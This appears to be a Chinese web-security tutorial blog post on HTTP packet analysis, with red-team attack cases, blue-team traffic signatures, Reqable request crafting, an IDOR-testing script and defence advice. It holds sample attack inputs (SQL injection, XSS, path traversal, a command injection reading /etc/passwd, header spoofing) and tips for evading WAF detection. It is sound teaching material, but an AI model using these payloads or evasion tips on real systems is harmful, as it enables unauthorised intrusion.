文章总结： 本文深入解析HTTP数据包分析，涵盖请求响应基础、红队攻击案例如UA注入与Cookie伪造、以及蓝队流量研判技术。通过Reqable工具演示数据包构造与自动化测试，分析状态码误判场景，并从红蓝队及开发视角提出防御建议，旨在提升Web安全攻防实战能力。 综合评分： 90 文章分类： WEB安全,渗透测试,红队,安全工具,漏洞分析

第12天-HTTP数据包分析演示案例

原创

萧瑶 萧瑶

Alfadi组织

2026年2月5日 12:14 江苏

一、HTTP请求与响应基础

请求与响应结构

客户端请求(Request)：

├─ 请求方法 (GET/POST/PUT/DELETE等)

├─ 请求路径 (/api/user, /login.php)

└─ 请求头 (User-Agent, Cookie, Content-Type等)

服务端响应(Response)：

├─ 状态码 (200, 404, 500等)

├─ 响应头 (Server, Content-Length, Set-Cookie等)

└─ 响应体 (HTML, JSON, 文件数据等)

HTTP请求方法详解

方法 说明 安全性 幂等性 典型场景

GET 获取资源 安全 幂等 浏览网页、查询数据

POST 提交数据 不安全 非幂等 登录、上传文件、下单

PUT 替换资源 不安全 幂等 更新用户信息

DELETE 删除资源 不安全 幂等 删除文章、用户

HEAD 获取头部 安全 幂等 检查资源是否存在

OPTIONS 查看方法 安全 幂等 CORS预检请求

TRACE 回显请求 安全 幂等 调试、诊断

CONNECT 隧道连接 不安全 非幂等 HTTPS代理

二、红队攻击案例分析

案例1：UA头攻击利用

攻击场景：网站记录UA头到数据库

GET /collect?ua=收集的用户代理信息 HTTP/1.1

Host: target.com

User-Agent: Mozilla/5.0' OR '1'='1' --

风险点：

· SQL注入：’ OR ‘1’=’1′ —

· 设备绕过：将PC UA改为移动端UA绕过访问限制

· 信息泄露：通过UA识别系统版本进行针对性攻击

案例2：Cookie身份伪造

GET /admin/dashboard HTTP/1.1

Host: target.com

Cookie: sessionid=合法用户的session值; admin=true

攻击手法：

1. 窃取合法用户的Cookie

2. 修改权限标识（如admin=false → admin=true）

3. Session固定攻击

案例3：POST登录爆破

POST /login HTTP/1.1

Host: target.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

username=admin&password=password123

攻击特征：

· 短时间内大量相似请求

· 密码字段变化频繁

· 返回状态码多为401/403

案例4：状态码文件探针

# 探测敏感文件

GET /config.php HTTP/1.1  # 返回200 → 文件存在

GET /backup.zip HTTP/1.1  # 返回403 → 存在但无权限

GET /test.xxx HTTP/1.1    # 返回404 → 文件不存在

# 探测目录

GET /admin/ HTTP/1.1      # 返回200 → 目录可访问

GET /backup/ HTTP/1.1     # 返回301/302 → 重定向

三、蓝队流量研判

1. 漏洞攻击识别

# SQL注入特征

GET /search?q=' OR 1=1-- HTTP/1.1

# XSS攻击特征

GET /comment?content=<script>alert(1)</script> HTTP/1.1

# 目录遍历特征

GET /../../../../etc/passwd HTTP/1.1

# 命令注入特征

POST /execute.php HTTP/1.1

cmd=whoami;ls -la;cat /etc/passwd

2. 安全工具指纹

# SQLmap特征

User-Agent: sqlmap/1.6#dev (https://sqlmap.org)

GET /?id=1' AND '1'='1

# Nmap特征

User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

# BurpSuite特征

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Via: 1.1 burpcollaborator.net

3. 异常行为识别

· 频率异常：同一IP短时间内大量请求

· 时间异常：非工作时间段访问

· 路径异常：访问非常规路径（备份文件、日志文件）

· 状态码异常：

  · 大量401/403：暴力破解

  · 大量404：目录/文件扫描

  · 大量500：漏洞利用尝试

四、Reqable数据包构造实战

1. 安装与基本使用

# 下载地址：https://reqable.com/

# 主要功能：

# - 请求/响应捕获

# - 数据包编辑重放

# - 自动化测试

# - 脚本支持

2. 自定义请求构造示例

场景1：修改请求方法测试

# 原始请求

GET /api/users/1 HTTP/1.1

# 修改为DELETE测试越权删除

DELETE /api/users/1 HTTP/1.1

# 修改为PUT测试数据篡改

PUT /api/users/1 HTTP/1.1

Content-Type: application/json

{"role": "admin", "balance": 999999}

场景2：添加/修改请求头

# 绕过WAF测试

GET /admin/ HTTP/1.1

Host: target.com

X-Forwarded-For: 127.0.0.1

X-Real-IP: 127.0.0.1

X-Originating-IP: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

# 测试CORS配置

GET /api/data HTTP/1.1

Origin: https://evil.com

场景3：参数污染测试

POST /login HTTP/1.1

Content-Type: application/x-www-form-urlencoded

username=admin&password=test123&password=realpassword&admin=1&role=administrator

场景4：JSON注入测试

POST /api/update HTTP/1.1

Content-Type: application/json

{

  "username": "admin",

  "age": 25,

  "role": "user\"},{\"role\":\"admin\",\"balance\":1000000},{\"ignore\":\""

}

3. 自动化测试脚本示例

# Reqable脚本示例 - 批量测试IDOR漏洞

import reqable

def onRequest(context, request):

    # 捕获所有用户相关的API请求

    if '/api/users/' in request.path:

        # 修改用户ID测试越权访问

        original\_id = request.path.split('/')[-1]

        # 测试其他用户ID

        for test\_id in ['1', '2', '100', 'admin']:

            new\_path = request.path.replace(original\_id, test\_id)

            # 创建新请求

            new\_request = request.copy()

            new\_request.path = new\_path

            # 发送测试请求

            context.send(new\_request)

    return request

五、状态码深度分析

状态码误判场景

# 场景1：容错处理导致误判

GET /不存在页面.html HTTP/1.1

# 返回：200 OK（实际上跳转到首页）

# 响应体是首页内容，不是404页面

# 场景2：自定义错误页面

GET /不存在的API接口 HTTP/1.1

# 返回：200 OK

# 响应体：{"code": 404, "message": "Not Found"}

# 场景3：安全防护干扰

GET /admin/ HTTP/1.1

# 返回：404 Not Found（实际是403但伪装成404）

# 真实情况：目录存在但无权限访问

状态码实战分析表

状态码 正常含义 异常含义 安全风险

200 请求成功 错误页面伪装成功 信息泄露、路径可访问

301 永久重定向 配置错误 可能被劫持

302 临时重定向 未授权跳转 开放重定向漏洞

400 客户端错误 参数异常 输入验证绕过

401 需要认证 认证失败 暴力破解、弱密码

403 禁止访问 权限不足 越权访问尝试

404 资源不存在 伪装404 敏感信息隐藏

500 服务器错误 代码异常 漏洞利用成功

六、防御建议

红队视角（攻击方）

1. 隐蔽性：修改默认工具指纹，使用合法UA

2. 低频慢速：避免触发WAF频率限制

3. 变异测试：同一漏洞使用不同Payload测试

4. 流量分析：学习正常流量模式，模仿正常请求

蓝队视角（防守方）

1. 流量基线：建立正常流量行为基线

2. 异常检测：监控异常状态码、请求频率

3. WAF规则：针对常见攻击特征部署规则

4. 日志审计：保留完整访问日志，定期分析

开发视角

1. 输入验证：所有输入都进行严格验证

2. 错误处理：统一错误页面，避免信息泄露

3. 权限控制：最小权限原则，服务器端校验

4. 安全头：添加CSP、HSTS等安全头部

工具推荐：

· 流量分析：Wireshark, tcpdump, Zeek

· 代理工具：BurpSuite, Reqable, OWASP ZAP

· 日志分析：ELK Stack, Splunk, Graylog

· WAF设备：ModSecurity, Naxsi, 商业WAF产品

持续学习资源：

· OWASP Testing Guide

· MITRE ATT&CK框架

· HackerOne公开报告

· 各类CTF比赛的Web题目

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Alfadi组织 萧瑶 萧瑶《第12天-HTTP数据包分析演示案例》